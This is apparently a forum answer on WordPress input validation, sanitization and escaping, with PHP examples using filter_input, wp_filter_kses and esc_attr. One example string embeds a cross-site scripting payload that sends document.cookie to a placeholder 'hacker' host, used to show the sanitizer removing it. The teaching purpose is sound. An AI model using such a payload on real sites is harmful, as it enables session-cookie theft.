Short Answer: If you have properly validated the data, then sanitization can be made optional.
Longer Answer
User-supplied data and data from unknown/external sources should always be treated as untrusted even in the case where the user was actually yourself, so yes, we should always validate and/or sanitize such data. And therefore, no, please do not store user input as-is without validating or sanitizing the data.
Excerpt from “Securing (sanitizing) Input” in the plugin developer handbook:
You use sanitizing when you don’t know what to expect or you don’t
want to be strict with data
validation.Any time you’re accepting potentially unsafe data, it is important to validate or sanitize it.
Remember: Even admins are users, and users will enter incorrect data
on purpose or on accident. It’s your job to protect them from
themselves.
And here are some examples which might help:
// let's assume $_POST['my_number_field'] is set
// same goes to $_POST['my_text_field']
// bad - no validation and no sanitization
update_post_meta( 123, 'int_meta', $_POST['my_number_field'] );
// no validation, but the value is sanitized
$value = filter_input( INPUT_POST, 'my_number_field', FILTER_SANITIZE_NUMBER_INT );
update_post_meta( 123, 'int_meta', $value );
// example with validation
if ( is_numeric( $_POST['my_number_field'] ) ) {
update_post_meta( 123, 'int_meta', (int) $_POST['my_number_field'] );
} else {
// show an error, delete the meta or whatever is necessary
}
// example with validation - here we specify a range of values
if ( in_array( $_POST['my_text_field'], array( 'one', 'two', '3' ) ) ) {
update_post_meta( 123, 'text_meta', $_POST['my_text_field'] );
} else {
// show an error, delete the meta or whatever is necessary
}
This is a little bit confusing, as wordpress sanitization functions
also encode some html characters. To my experience, this easily leads
to double encoding (especially if you can’t use wordpress-functions
like esc_html and esc_attr which do not double encode).
Maybe I’m not fully understanding that, but it seemed that you’re probably just not using the correct functions?
For example, if you’re trying to sanitize a data in which HTML tags are allowed, then you would want to use the WordPress KSES functions like wp_filter_kses()
(to allow basic HTML tags) and wp_filter_post_kses()
(to allow all the many HTML tags allowed in post content like p
):
$value="<p>some dynamic input data with <b>html</b>, <q>a quote</q> & potentially " . // wrapped
'unsafe code..</p> "><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>';
// This allows only basic HTML tags like strong and blockquote.
update_post_meta( 123, 'foo_meta', wp_filter_kses( $value ) );
// This allows advanced HTML tags (p, div, etc.) and attributes.
update_post_meta( 123, 'foo_meta', wp_filter_post_kses( $value ) );
Then when rendering the data, you would use escaping functions like esc_textarea()
, esc_attr()
and wp_kses_post()
:
<!-- In a form field, use esc_attr() or esc_textarea() for textarea fields -->
<input value="<?php echo esc_attr( get_post_meta( 123, 'foo_meta', true ) ); ?>">
<textarea rows="3"><?php echo esc_textarea( get_post_meta( 123, 'foo_meta', true ) ); ?></textarea>
<h2>Foo meta</h2>
<!-- Use wp_kses_post() when **not** displaying in form fields -->
<?php echo wp_kses_post( get_post_meta( 123, 'foo_meta', true ) ); ?>
Or perhaps you misunderstood the difference between sanitizing and escaping?
Because basically, sanitizing means cleaning/filtering the input, whereas escaping means we secure the output so that for example HTML tags are not parsed unless if we were allowing HTML tags in the input. (but even if HTML is allowed, you should limit the allowed tags)
And I’ve actually given an example above where I sanitized the meta value (that came from a variable named $value
which is the input) and then I escaped the meta value when displaying it on the page. So in the latter case, the meta value (which was retrieved from the database) became an output when I echoed the value.